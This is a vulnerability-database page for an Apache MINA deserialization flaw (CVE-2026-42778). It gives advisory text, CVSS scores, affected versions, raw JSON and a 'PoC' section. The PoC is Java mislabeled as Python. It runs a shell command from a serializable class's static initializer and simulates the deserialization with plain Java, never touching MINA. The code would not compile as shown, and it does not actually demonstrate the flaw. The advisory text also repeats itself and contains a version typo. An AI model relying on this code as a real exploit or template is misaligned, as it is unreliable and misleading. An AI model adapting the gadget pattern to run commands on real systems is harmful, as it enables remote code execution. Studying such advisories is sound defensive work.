Security Vulnerability Report
中文
CVE-2026-42778 CVSS 9.8 CRITICAL

CVE-2026-42778

Published: 2026-05-01 11:16:19
Last Modified: 2026-05-01 17:55:49
Source: [email protected]

Description

The fix for CVE-2026-41409 was not applied to the 2.1.X and 2.2.X branches. Here was the original issue description: The fix for CVE-2024-52046 in Apache MINA AbstractIoBuffer.getObject() was incomplete. The classname allowlist of classes allowed to be deserialized was applied too late after a static initializer in a class to be read might already have been executed. Affected versions are Apache MINA 2.1.0 <= 2.1.11, and 2.2.0 <= 2.2.6. The problem is resolved in Apache MINA 2.1.12, and 2.2.7 by applying the classname allowlist earlier. Affected are applications using Apache MINA that call IoBuffer.getObject(). Applications using Apache MINA are advised to upgrade The fix for CVE-2024-52046 in Apache MINA AbstractIoBuffer.getObject() was incomplete. The classname allowlist of classes allowed to be deserialized was applied too late after a static initializer in a class to be read might already have been executed. Affected versions are Apache MINA 2.1.0 <= 2.1.110, and 2.2.0 <= 2.2.6. The problem is resolved in Apache MINA 2.1.12, and 2.2.7 by applying the classname allowlist earlier. Affected are applications using Apache MINA that call IoBuffer.getObject(). Applications using Apache MINA are advised to upgrade

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:apache:mina:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:apache:mina:*:*:*:*:*:*:*:* - VULNERABLE
Apache MINA 2.1.0 - 2.1.11
Apache MINA 2.2.0 - 2.2.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import java.io.*; // Mock malicious class simulating a gadget public class MaliciousPayload implements Serializable { static { try { // This code runs before the allowlist check in vulnerable versions Runtime.getRuntime().exec("touch /tmp/pwned"); System.out.println("[+] Exploit: Static initializer executed!"); } catch (Exception e) { e.printStackTrace(); } } } public class Exploit { public static void main(String[] args) throws Exception { // 1. Create malicious serialized data ByteArrayOutputStream bos = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(bos); oos.writeObject(new MaliciousPayload()); oos.close(); byte[] data = bos.toByteArray(); // 2. Simulate vulnerable IoBuffer.getObject() logic // Vulnerability: Deserialization happens before allowlist check try { ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data)); Object obj = ois.readObject(); // Static block runs HERE // Allowlist check happens too late (after code execution) if (!obj.getClass().getName().equals("allowed.SafeClass")) { throw new SecurityException("Blocked by allowlist"); } } catch (SecurityException e) { System.out.println("[-] Security check failed (but code already ran)"); } } }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42778", "sourceIdentifier": "[email protected]", "published": "2026-05-01T11:16:19.383", "lastModified": "2026-05-01T17:55:49.277", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The fix for CVE-2026-41409 was not applied to the 2.1.X and 2.2.X branches. Here was the original issue description:\n\n\n\n\nThe fix for CVE-2024-52046 in Apache MINA AbstractIoBuffer.getObject() was incomplete. The classname allowlist of classes allowed to be deserialized was applied too late after a static initializer in a class to be read might already have been executed.\n\n\n\n\nAffected versions are Apache MINA 2.1.0 <= 2.1.11, and 2.2.0 <= 2.2.6.\n\n\n\n\nThe problem is resolved in Apache MINA 2.1.12, and 2.2.7 by \napplying the classname allowlist earlier.\n\n\n\n\nAffected are applications using Apache MINA that call IoBuffer.getObject().\n\n\n\n\nApplications using Apache MINA are advised to upgrade\n\n\n\n\n\n\nThe fix for CVE-2024-52046 in Apache MINA AbstractIoBuffer.getObject() was incomplete. The classname allowlist of classes allowed to be deserialized was applied too late after a static initializer in a class to be read might already have been executed.\n\n\n\n\nAffected versions are Apache MINA 2.1.0 <= 2.1.110, and 2.2.0 <= 2.2.6.\n\n\n\n\nThe problem is resolved in Apache MINA 2.1.12, and 2.2.7 by \napplying the classname allowlist earlier.\n\n\n\n\nAffected are applications using Apache MINA that call IoBuffer.getObject().\n\n\n\n\nApplications using Apache MINA are advised to upgrade"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:mina:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.1.0", "versionEndExcluding": "2.1.12", "matchCriteriaId": "BD7E18F5-1CE6-4CD7-8A0D-BD0C2574FF12"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:mina:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.2.0", "versionEndExcluding": "2.2.7", "matchCriteriaId": "758E989E-5CB0-471C-AADB-43EB3FB95407"}]}]}], "references": [{"url": "https://lists.apache.org/thread/fhlx5k91hrkgyzh7yk1nghrn3k27gxy0", "source": "[email protected]", "tags": ["Mailing List", "Patch", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.